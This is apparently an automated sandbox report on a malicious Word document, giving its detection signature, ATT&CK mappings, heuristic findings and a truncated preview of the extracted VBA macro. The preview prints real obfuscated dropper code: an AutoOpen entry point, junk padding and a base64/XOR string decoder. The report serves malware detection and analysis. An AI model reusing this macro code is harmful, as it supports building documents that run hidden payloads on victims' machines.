MALICIOUS
228
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV with the signature 'Doc.Malware.Chronos-6897935-0'. High-severity heuristics indicate the presence of VBA macros, specifically an AutoOpen macro that uses GetObject for execution. The VBA script itself appears heavily obfuscated, but its structure suggests it is designed to execute further code, likely a second-stage payload. This points to a macro-based malware delivery mechanism.
Heuristics 7
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11287 bytes |
SHA-256: 9d1767de9ec8409cba0113ab8104fb22cb63d6392401ac29ca40d7729840fd96 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ResetStartNo()
Dim SettingsFile As String
Dim Order As String
Dim sQuery As String
SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini"
Order = System.PrivateProfileString(SettingsFile, "DocNumber", "Order")
sQuery = InputBox("Reset start number?", "Reset", Order)
If sQuery = "" Then Exit Sub
Order = sQuery
System.PrivateProfileString(SettingsFile, "DocNumber", "Order") = Order
lbl_Exit:
Exit Sub
End Sub
Function highboy(abigail) As String
involvement = StrReverse("pa") + Left("ogeedichondra", 4)
Dim couth(63) As Long
scleroparei = "cautiously"
Dim buxaceae() As Byte
Dim blowy As Integer
Dim officiousness(255) As Byte
Dim analyze(63) As Long
Dim amarelle(63) As Long
Dim nagari() As Byte
Dim antigone As Long
Dim intercourse As String
Dim atelier As Long
Dim city As Long
Dim defiant As Long
santolina = 258048
cataplasm = 262144
pneumatograph = 4 - 17 + 4109
sauromalus = 65536
cerebrovascular = 4032
exhausted = 6 + 249
delusion = 91 - 86 + 117 + 65158
antisocial = 64
biotic = 16711680
malm = 256
nitrate = 63
needlebush = 16515072
Dim aviatrix As Variant
Dim humanities() As Byte
humanities = StrConv(abigail, vbFromUnicode)
Dim stenographic As Byte
For harmonically = 0 To UBound(humanities)
humanities(harmonically) = humanities(harmonically) + 2 Xor 20
Next harmonically
For beware = 42 To 60
cetorhinidae = 60
suppressive = suppressive - 279
catostomid = Mid("nyctaginiamancrystallography", 11, 3) + "ganit" + "e"
catostomid = Lcase("aL") + Ucase("buQUe") + Right("indrirque", 4)
Next beware
bosh = StrConv(humanities, vbUnicode)
blowy = 2
cups = 122
For atelier = 0 To 255
Select Case atelier
Case 65 To 90
officiousness(atelier) = atelier - 65
Case 97 To cups
officiousness(atelier) = atelier - 71
Case 48 To 57
officiousness(atelier) = atelier + 51 + 57 + 88 - 192
Case 43
officiousness(atelier) = 62
Case 47
officiousness(atelier) = 63
End Select
Next atelier
For atelier = 0 To 63
couth(atelier) = atelier * antisocial
analyze(atelier) = atelier * pneumatograph
amarelle(atelier) = atelier * cataplasm
Next atelier
buxaceae = StrConv(bosh, vbFromUnicode)
preachment = 4
ReDim nagari((((UBound(buxaceae) + 1) \ preachment) * 3) - 1)
For antigone = 0 To UBound(buxaceae) Step 4
chemotherapeutic = buxaceae(antigone)
petrel = 3
city = amarelle(officiousness(chemotherapeutic)) + analyze(officiousness(buxaceae(antigone + 1))) + _
couth(officiousness(buxaceae(antigone + 2))) + officiousness(buxaceae(antigone + petrel))
atelier = city And biotic
nagari(defiant) = atelier \ sauromalus
atelier = city And delusion
nagari(defiant + 1) = atelier \ malm
nagari(defiant + 2) = city And exhausted
defiant = defiant + 3
Next antigone
intercourse = StrConv(nagari, vbUnicode)
If blowy Then intercourse = Left$(intercourse, Len(intercourse) - blowy)
highboy = intercourse
End Function
Public Sub AutoOpen()
Dim carpellary As Integer
Dim fortemente As Integer
involvement = "nephritis"
Dim bihari As Integer
Dim ascospore As Byte
bihari = 8 Mod (20)
duodenal = Right("anachronicac", 2) + Ucase("CidE") + Mid("edulcoratentinterruption", 11, 2)
If bihari < 111 - 242 Then
suppressive = suppressive - 437
TestPassing1
Else
Dim movableness As Integer
dichloride.Scroll fmScrollActionNoChange, fmScrollActionEnd
psychogenic = 82
chlorination = 63
If psychogenic + chlorination < 9 Then
psychogenic = "bab" & StrReverse("diise") & Lcase("aE")
animam = StrReverse("or") + "otle" + Mid("antiquariantdemonstrate", 12, 1)
Else
chlorination = 30
End If
End If
End Sub
Sub mastoiditis(peninsula)
Dim alouatta As String
Dim teachable As Integer
Dim paths As Long
shirker = shirker \ 254
beseem = Left("tacatspaw", 2) + Right("benchngie", 4) + Right("fitted
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.